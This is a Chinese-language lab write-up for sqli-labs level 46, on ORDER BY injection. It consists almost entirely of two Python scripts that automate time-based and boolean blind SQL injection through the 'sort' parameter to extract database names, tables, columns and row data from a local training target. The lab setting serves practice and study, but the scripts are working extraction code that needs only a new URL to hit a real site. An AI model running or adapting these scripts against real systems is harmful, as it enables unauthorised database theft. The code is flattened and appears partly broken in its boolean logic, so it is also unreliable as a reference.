sql-labs靶场46关:order by注入
测试前注意打开小皮面板,打开apache和MySQL服务
http://127.0.0.1:8080/sqli-labs/ 注意端口不要写错
利用orderby注入技术进行排序操作,进而实现报错注入和盲注,最终通过Python脚本自动化提取数据库名称的过程。
方法一:时间盲注
import requests
import time# 目标 URL
url = "http://127.0.0.1:8080/sqli-labs/Less-46/"# 时间盲注函数
def injiect_data(payload):params = {"sort": payload}start_time = time.time()response = requests.get(url, params=params)end_time = time.time()# 如果响应时间超过 3 秒,认为条件成立return end_time - start_time > 3# 获取数据库名
def get_database_name():database_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload = f"1 AND IF(ASCII(SUBSTR(DATABASE(), {i}, 1)) = {ascii_code}, SLEEP(3), 0)"if injiect_data(payload):database_name += chr(ascii_code)breakreturn database_name# 获取表名
def get_table_names(database_name):table_names = []table_index = 0while True:table_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload = f"1 AND IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema = '{database_name}' LIMIT {table_index}, 1), {i}, 1)) = {ascii_code}, SLEEP(3), 0)"if injiect_data(payload):table_name += chr(ascii_code)breakif table_name:table_names.append(table_name)table_index += 1else:breakreturn table_names# 获取列名
def get_column_names(database_name, table_name):column_names = []column_index = 0while True:column_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload = f"1 AND IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema = '{database_name}' AND table_name = '{table_name}' LIMIT {column_index}, 1), {i}, 1)) = {ascii_code}, SLEEP(3), 0)"if injiect_data(payload):column_name += chr(ascii_code)breakif column_name:column_names.append(column_name)column_index += 1else:breakreturn column_names# 获取数据
def get_data(database_name, table_name, column_name):data = []row_index = 0while True:row_data = ""for i in range(1, 20):for ascii_code in range(32, 127):payload = f"1 AND IF(ASCII(SUBSTR((SELECT {column_name} FROM {database_name}.{table_name} LIMIT {row_index}, 1), {i}, 1)) = {ascii_code}, SLEEP(3), 0)"if injiect_data(payload):row_data += chr(ascii_code)breakif row_data:data.append(row_data)row_index += 1else:breakreturn data# 主程序
if __name__ == "__main__":# 获取数据库名database = get_database_name()print(f"数据库名: {database}")# 获取表名tables = get_table_names(database)print(f"表名: {tables}")for table in tables:# 获取列名columns = get_column_names(database, table)print(f"表 {table} 的列名: {columns}")for column in columns:# 获取数据data = get_data(database, table, column)print(f"表 {table} 的 {column} 列的数据: {data}")
方法二:布尔盲注
import requests# 目标 URL
url = "http://127.0.0.1:8080/sqli-labs/Less-46/"# 布尔盲注函数
def injiect_data(payload_true, payload_false):params_true = {"sort": payload_true}params_false = {"sort": payload_false}response_true = requests.get(url, params=params_true)response_false = requests.get(url, params=params_false)return response_true.text != response_false.text# 获取数据库名
def get_database_name():database_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload_true = f"1 AND ASCII(SUBSTR(DATABASE(), {i}, 1)) > {ascii_code}"payload_false = f"1 AND ASCII(SUBSTR(DATABASE(), {i}, 1)) <= {ascii_code}"if injiect_data(payload_true, payload_false):database_name += chr(ascii_code + 1)breakreturn database_name# 获取表名
def get_table_names(database_name):table_names = []table_index = 0while True:table_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload_true = f"1 AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema = '{database_name}' LIMIT {table_index}, 1), {i}, 1)) > {ascii_code}"payload_false = f"1 AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema = '{database_name}' LIMIT {table_index}, 1), {i}, 1)) <= {ascii_code}"if injiect_data(payload_true, payload_false):table_name += chr(ascii_code + 1)breakif table_name:table_names.append(table_name)table_index += 1else:breakreturn table_names# 获取列名
def get_column_names(database_name, table_name):column_names = []column_index = 0while True:column_name = ""for i in range(1, 20):for ascii_code in range(32, 127):payload_true = f"1 AND ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema = '{database_name}' AND table_name = '{table_name}' LIMIT {column_index}, 1), {i}, 1)) > {ascii_code}"payload_false = f"1 AND ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_schema = '{database_name}' AND table_name = '{table_name}' LIMIT {column_index}, 1), {i}, 1)) <= {ascii_code}"if injiect_data(payload_true, payload_false):column_name += chr(ascii_code + 1)breakif column_name:column_names.append(column_name)column_index += 1else:breakreturn column_names# 获取数据
def get_data(database_name, table_name, column_name):data = []row_index = 0while True:row_data = ""for i in range(1, 20):for ascii_code in range(32, 127):payload_true = f"1 AND ASCII(SUBSTR((SELECT {column_name} FROM {database_name}.{table_name} LIMIT {row_index}, 1), {i}, 1)) > {ascii_code}"payload_false = f"1 AND ASCII(SUBSTR((SELECT {column_name} FROM {database_name}.{table_name} LIMIT {row_index}, 1), {i}, 1)) <= {ascii_code}"if injiect_data(payload_true, payload_false):row_data += chr(ascii_code + 1)breakif row_data:data.append(row_data)row_index += 1else:breakreturn data# 主程序
if __name__ == "__main__":# 获取数据库名database = get_database_name()print(f"数据库名: {database}")# 获取表名tables = get_table_names(database)print(f"表名: {tables}")for table in tables:# 获取列名columns = get_column_names(database, table)print(f"表 {table} 的列名: {columns}")for column in columns:# 获取数据data = get_data(database, table, column)print(f"表 {table} 的 {column} 列的数据: {data}")
此处代码都是没有问题,排查错误后发现是数据库连不上或是数据库内容丢失,后面会再次修改。
